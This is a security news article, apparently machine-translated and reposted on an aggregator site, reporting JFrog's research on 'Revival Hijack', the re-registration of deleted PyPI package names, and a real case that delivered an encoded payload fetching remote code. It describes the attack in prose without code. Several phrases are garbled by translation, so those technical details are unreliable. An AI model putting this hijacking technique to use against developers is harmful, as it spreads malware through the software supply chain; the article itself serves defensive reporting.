Close Menu
Indo Guard OnlineIndo Guard Online
  • Home
  • Cyber Security
  • Risk Management
  • Travel
  • Security News
  • Tech
  • More
    • Data Privacy
    • Data Protection
    • Global Security
What's Hot

Both Vextrio and affiliates control the global network

June 12, 2025

How to Decide Safety Expanding

June 12, 2025

The new tokenbreak attack combines AI moderation with a one -sided character change

June 12, 2025
Facebook X (Twitter) Instagram
Facebook X (Twitter) Instagram YouTube
Indo Guard OnlineIndo Guard Online
Subscribe
  • Home
  • Cyber Security
  • Risk Management
  • Travel
  • Security News
  • Tech
  • More
    • Data Privacy
    • Data Protection
    • Global Security
Indo Guard OnlineIndo Guard Online
Home » Hackers hijacked 22,000 PyPI remote packages, distributing malicious code to developers
Global Security

Hackers hijacked 22,000 PyPI remote packages, distributing malicious code to developers

AdminBy AdminSeptember 4, 2024No Comments4 Mins Read
Share
Facebook Twitter LinkedIn Pinterest Email Copy Link


September 4, 2024Ravi Lakshmanan

A new supply chain attack technique targeting the Python Package Index (PyPI) registry has been used in the wild in an attempt to infiltrate downstream organizations.

Codenamed Revival Hijack, JFrog, a software supply chain security company, said the attack method could be used to hijack 22,000 existing PyPI packages and lead to “hundreds of thousands” of malicious package downloads. These sensitive packages have more than 100,000 downloads or have been active for more than six months.

“This attack method involves capturing PyPI software packages by manipulating their ability to be re-registered after they have been removed from the PyPI index by the original owner,” JFrog security researchers Andrei Palkavnichenko and Brian Musali said in the report shared with The Hacker News.

Essentially, the attack involves removing several Python packages published to the PyPI repository, making them available for registration by any other user.

Cyber ​​security

Statistics shared by JFrog show that an average of about 309 packages are removed each month. This can happen for a variety of reasons: lack of maintenance (such as software abandonment), re-publishing a package under a different name, or introducing the same functionality into official libraries or built-in APIs.

It also creates a profitable attack surface that is more effective than typosquatting and that an attacker using their own accounts can use to publish malicious packages with the same name and newer version to infect a development environment.

“The method does not depend on the victim making a mistake when installing the package,” the researchers said, showing how Revival Hijack can perform better from an adversary’s perspective. “Many users consider ‘upgrading a ‘once secure’ package to the latest version to be a safe operation.”

Although PyPI has protections against impersonation and print attempts, JFrog’s analysis found that running “the list of items is outdated” command lists the fake package as a new version of the original package, with the former matching a different package from a completely different author.

More worryingly, the launch of “pip install –upgrade” team replaces the actual package with a fake one without much warning that the package author has changed, potentially exposing unwitting developers to enormous software supply chain risk.

JFrog said he made a new PyPI user account called “security_holding“, which he used to securely capture sensitive packets and replace them with empty placeholders to prevent attackers from exploiting the deleted packets.

Additionally, each of these packages has been assigned a version number of 0.0.0.1 – the opposite of attack of addiction confusion script – to avoid drag and drop by developers when running the pip update command.

More worryingly, Revival Hijack has already been used in the wild, and an unknown threat actor named Ginis is introducing a benign version of the package called “pingdomv3” March 30, 2024, the same day the original owner (Cheneyian) removed the package from PyPI.

On April 12, 2024, a new developer is said to have released an update that contains a Base64-encoded payload that checks for “JENKINS_URL” environment variable and, if present, executes an unknown next-stage module received from the remote server.

Cyber ​​security

“This suggests that the attackers either delayed the attack or designed it to be more targeted, perhaps by limiting it to a specific IP range,” JFrog said.

The new attack is a sign that threat actors are considering supply chain attacks on a broader scale, targeting deleted PyPI packages to expand their reach to companies. Organizations and developers are encouraged to audit their DevOps pipelines to ensure they are not installing packages that have already been removed from the repository.

“Exploiting vulnerable behavior in the handling of remote packages allowed attackers to hijack existing packages, making it possible to install them on target systems without any changes to the user’s workflow,” said Musali, head of JFrog’s security research team.

“The attack surface of PyPI packages is constantly growing. Despite the active intervention, users should always remain vigilant and take the necessary precautions to protect themselves and the PyPI community from this hacking technique.”

Did you find this article interesting? Follow us Twitter  and LinkedIn to read more exclusive content we publish.





Source link

Share. Facebook Twitter Pinterest LinkedIn Tumblr Email Copy Link
Admin
  • Website

Related Posts

Both Vextrio and affiliates control the global network

June 12, 2025

How to Decide Safety Expanding

June 12, 2025

The new tokenbreak attack combines AI moderation with a one -sided character change

June 12, 2025

AI AI agents work on secret accounts – learn how to fasten them in this webinar

June 12, 2025

Zero Press AI Vulnerability exposes Copilot Microsoft 365 data without interaction with users

June 12, 2025

Connecting to Turn Signing Signing Code Screenconnect with -wit security risks

June 12, 2025
Add A Comment
Leave A Reply Cancel Reply

Loading poll ...
Coming Soon
Do You Like Our Website
: {{ tsp_total }}

Subscribe to Updates

Get the latest security news from Indoguardonline.com

Latest Posts

Both Vextrio and affiliates control the global network

June 12, 2025

How to Decide Safety Expanding

June 12, 2025

The new tokenbreak attack combines AI moderation with a one -sided character change

June 12, 2025

AI AI agents work on secret accounts – learn how to fasten them in this webinar

June 12, 2025

Zero Press AI Vulnerability exposes Copilot Microsoft 365 data without interaction with users

June 12, 2025

Connecting to Turn Signing Signing Code Screenconnect with -wit security risks

June 12, 2025

More than 80,000 Microsoft Entra ID credits, directed using an open source Teamfiltration tool

June 12, 2025

Former Black Basta Members use Microsoft teams and Python scripts in 2025

June 11, 2025
About Us
About Us

Provide a constantly updating feed of the latest security news and developments specific to Indonesia.

Facebook X (Twitter) Pinterest YouTube WhatsApp
Our Picks

Both Vextrio and affiliates control the global network

June 12, 2025

How to Decide Safety Expanding

June 12, 2025

The new tokenbreak attack combines AI moderation with a one -sided character change

June 12, 2025
Most Popular

In Indonesia, crippling immigration ransomware breach sparks privacy crisis

July 6, 2024

Why Indonesia’s Data Breach Crisis Calls for Better Security

July 6, 2024

Indonesia’s plan to integrate 27,000 govt apps in one platform welcomed but data security concerns linger

July 6, 2024
© 2025 indoguardonline.com
  • Home
  • About us
  • Contact us
  • Privacy Policy

Type above and press Enter to search. Press Esc to cancel.